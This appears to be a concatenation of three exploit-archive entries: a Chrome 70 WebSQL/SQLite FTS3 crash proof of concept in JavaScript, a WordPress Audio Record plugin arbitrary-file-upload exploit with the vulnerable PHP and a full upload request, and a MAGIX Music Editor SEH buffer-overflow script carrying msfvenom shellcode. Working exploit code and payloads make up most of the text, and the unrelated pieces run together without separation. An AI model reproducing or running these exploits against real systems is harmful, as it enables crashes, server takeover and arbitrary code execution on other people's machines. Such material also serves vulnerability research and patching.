I/DEBUG ( 142): pid: 3801, tid: 3854, name: Database thread >>> com.android.chrome:sandboxed_process6 <<<
I/DEBUG ( 142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457
I/DEBUG ( 142): r0 e0ddb457 r1 611be0ab r2 00000002 r3 ff000000
I/DEBUG ( 142): r4 611be038 r5 00000002 r6 611be0a9 r7 7fffffff
I/DEBUG ( 142): r8 00000001 r9 611be0ab sl 80000001 fp 00000000
I/DEBUG ( 142): ip 00000066 sp 6defd3a0 lr 00000074 pc 4025eb62 cpsr 680f2430
I/DEBUG ( 142):
I/DEBUG ( 142): backtrace:
I/DEBUG ( 142): #00 pc 0000fb62 /system/lib/libc.so (__memcpy_base+217)
I/DEBUG ( 142): #01 pc 018d0e1d /data/app/com.android.chrome-1/base.apk
</pre>
<h1>What's affected?</h1>
<p>Affected: tested, causes one tab/one window to crash:</p>
<ul>
<li>Chrome 70.0.3538.110 on Android 5.1 and 9</li>
<li>Electron 2.0.12 on macOS 10.14</li>
</ul>
<p>Not affected:</p>
<ul>
<li>Chrome 71.0.3578.98 on Android 8.1 (already fixed)</li>
<li>Safari (doesn't have FTS enabled in SQLite3)</li>
<li>Browsers not based on Chrome (no WebSQL support)</li>
</ul>
<script>
// https://gist.github.com/nolanlawson/0264938033aca2201012
// https://www.sqlite.org/src/info/940f2adc8541a838
const db = openDatabase('fts_demo', 1, 'fts_demo', 5000000);
const firstStatements = [
"DROP TABLE IF EXISTS ft;",
"CREATE VIRTUAL TABLE ft USING fts3;",
"INSERT INTO ft VALUES('aback');",
"INSERT INTO ft VALUES('abaft');",
"INSERT INTO ft VALUES('abandon');",
];
const secondStatements = [
"SELECT quote(root) from ft_segdir;",
"UPDATE ft_segdir SET root = X'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200';",
"SELECT * FROM ft WHERE ft MATCH 'abandon';"
];
function dbSuccess() {
console.log("success");
console.log(arguments);
}
function dbErr() {
console.log("err");
console.log(arguments);
}
function runAll(statements, success) {
db.transaction((tx) => {
console.log("alive");
for (const statement of statements) {
console.log("queueing " + statement);
tx.executeSql(statement, [], dbSuccess, dbErr);
}
console.log("queued");
}, dbErr, success);
}
function crash() {
runAll(firstStatements, (event) => {
console.log(event);
runAll(secondStatements, (event) => {
console.log(event);
});
});
}
// onload
function getChromeVersion(userAgent) {
for (const part of userAgent.split(" ")) {
if (part.startsWith("Chrome/") || part.startsWith("Chromium/")) {
return part.substring(part.indexOf("/") + 1);
}
}
return null;
}
function isChromeSupported(chromeVersion) {
if (chromeVersion == null) return false;
const firstPart = chromeVersion.substring(0, chromeVersion.indexOf("."));
return parseInt(firstPart) <= 70;
}
function getPromptText(userAgent) {
const chromeVersion = getChromeVersion(userAgent);
if (chromeVersion == null) {
return "This demo only works on Chrome 70 or below. Open this page in Chrome 70, then tap the button.";
}
const chromeOK = isChromeSupported(chromeVersion);
if (chromeOK) {
return "You're using Chrome 70 or below, so you may be vulnerable. Tap the button to crash this page.";
}
return "Your Chrome is too new. Open this page in Chrome 70, then tap the button.";
}
function onLoad() {
document.getElementById("browserUserAgent").textContent = navigator.userAgent;
document.getElementById("prompttext").textContent = getPromptText(navigator.userAgent);
}
window.onload = onLoad;
</script>
# Exploit Title: WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
# Date: 2018-12-24
# Software Link: https://wordpress.org/plugins/audio-record/
# Exploit Author: Kaimi
# Website: https://kaimi.io
# Version: 1.0
# Category: webapps
# Unrestricted file upload in record upload process allowing arbitrary extension.
# File: recorder.php
# Vulnerable code:
function save_record_callback() {
foreach(array('audio') as $type) {
if (isset($_FILES["${type}-blob"])) {
$fileName = uniqid() . '_' .$_POST["${type}-filename"] ;
$path_array = wp_upload_dir();
$path = str_replace('\\', '/', $path_array['path']);
$uploadDirectory = $path . "/$fileName";
if (!move_uploaded_file($_FILES["${type}-blob"]["tmp_name"], $uploadDirectory)) {
echo 000;
wp_die("problem moving uploaded file");
}
# Exploitation example:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------18311719029180117571501079851
...
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="audio-filename"
file.php
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="audio-blob"; filename="blob"
Content-Type: audio/wav
<?php phpinfo();
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="action"
save_record
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="course_id"
undefined
-----------------------------18311719029180117571501079851
Content-Disposition: form-data; name="unit_id"
undefined
-----------------------------18311719029180117571501079851--
# Uploaded file will be located at standard WordPress media upload directory (for ex: /wp-content/uploads/year/month/).
# If directory listing is disabled - file name can be guessed due to cryptographically insecure nature of uniqid() call.
# Exploit Title: MAGIX Music Editor 3.1 - Buffer Overflow (SEH)
# Exploit Author: bzyo
# Twitter: @bzyo_
# Date: 2018-12-24
# Vulnerable Software: MAGIX Music Editor 3.1
# Vendor Homepage: https://www.magix.com/us/
# Version: 3.1
# Software Link: https://www.magix.com/us/music/mp3-deluxe/
# Music Editor Software is bundled with MP3 Deluxe 19
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. open music editor 3
# 3. go to CD > freedb options > FreeDB Proxy Options
# 4. copy/paste magix.txt contents into Server field
# 5. select Accept settings
# 6. pop calc
#!/usr/bin/python
filename="magix.txt"
#lol
junk = "A"*420
#jump 6
nseh = "\xeb\x06\xcc\xcc"
#0x10015b08 : pop ecx # pop ecx # ret | ascii {PAGE_EXECUTE_READ} [dac3x.dll]
seh = "\x08\x5b\x01\x10"
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00" -e x86/alpha_mixed -f c
#Payload size: 447 bytes
calc = ("\xda\xd4\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4b\x58\x4b\x32\x67\x70\x55\x50\x45\x50\x45\x30\x6e\x69"
"\x6b\x55\x54\x71\x49\x50\x65\x34\x6c\x4b\x72\x70\x70\x30\x6e"
"\x6b\x76\x32\x46\x6c\x6c\x4b\x43\x62\x65\x44\x4e\x6b\x50\x72"
"\x64\x68\x66\x6f\x58\x37\x52\x6a\x31\x36\x45\x61\x4b\x4f\x6e"
"\x4c\x67\x4c\x43\x51\x61\x6c\x75\x52\x34\x6c\x51\x30\x6b\x71"
"\x7a\x6f\x56\x6d\x45\x51\x78\x47\x7a\x42\x4c\x32\x56\x32\x56"
"\x37\x6e\x6b\x32\x72\x42\x30\x4e\x6b\x32\x6a\x37\x4c\x6c\x4b"
"\x72\x6c\x67\x61\x61\x68\x4a\x43\x30\x48\x73\x31\x6b\x61\x66"
"\x31\x6e\x6b\x43\x69\x57\x50\x46\x61\x5a\x73\x4c\x4b\x51\x59"
"\x42\x38\x4d\x33\x37\x4a\x30\x49\x6e\x6b\x46\x54\x6c\x4b\x76"
"\x61\x68\x56\x65\x61\x4b\x4f\x4c\x6c\x5a\x61\x78\x4f\x56\x6d"
"\x56\x61\x58\x47\x65\x68\x4b\x50\x53\x45\x48\x76\x37\x73\x71"
"\x6d\x78\x78\x55\x6b\x31\x6d\x44\x64\x64\x35\x59\x74\x72\x78"
"\x4c\x4b\x31\x48\x66\x44\x36\x61\x6a\x73\x70\x66\x6e\x6b\x74"
"\x4c\x42\x6b\x6e\x6b\x46\x38\x57\x6c\x36\x61\x38\x53\x6c\x4b"
"\x64\x44\x6c\x4b\x46\x61\x5a\x70\x6d\x59\x32\x64\x61\x34\x46"
"\x44\x53\x6b\x61\x4b\x63\x51\x36\x39\x31\x4a\x52\x71\x69\x6f"
"\x4b\x50\x71\x4f\x61\x4f\x70\x5a\x6e\x6b\x66\x72\x78\x6b\x6c"
"\x4d\x31\x4d\x31\x7a\x43\x31\x4e\x6d\x4b\x35\x68\x32\x47\x70"
"\x65\x50\x65\x50\x36\x30\x62\x48\x54\x71\x4c\x4b\x42\x4f\x4f"
"\x77\x59\x6f\x4e\x35\x4d\x6b\x68\x70\x68\x35\x4d\x72\x52\x76"
"\x30\x68\x4e\x46\x5a\x35\x4d\x6d\x6f\x6d\x59\x6f\x4a\x75\x35"
"\x6c\x46\x66\x73\x4c\x75\x5a\x4d\x50\x69\x6b\x79\x70\x51\x65"
"\x76\x65\x6f\x4b\x33\x77\x74\x53\x31\x62\x70\x6f\x73\x5a\x33"
"\x30\x76\x33\x39\x6f\x58\x55\x30\x63\x75\x31\x52\x4c\x73\x53"
"\x36\x4e\x52\x45\x53\x48\x32\x45\x65\x50\x41\x41")
fill = "C"*2000
buffer = junk + nseh + seh + calc + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()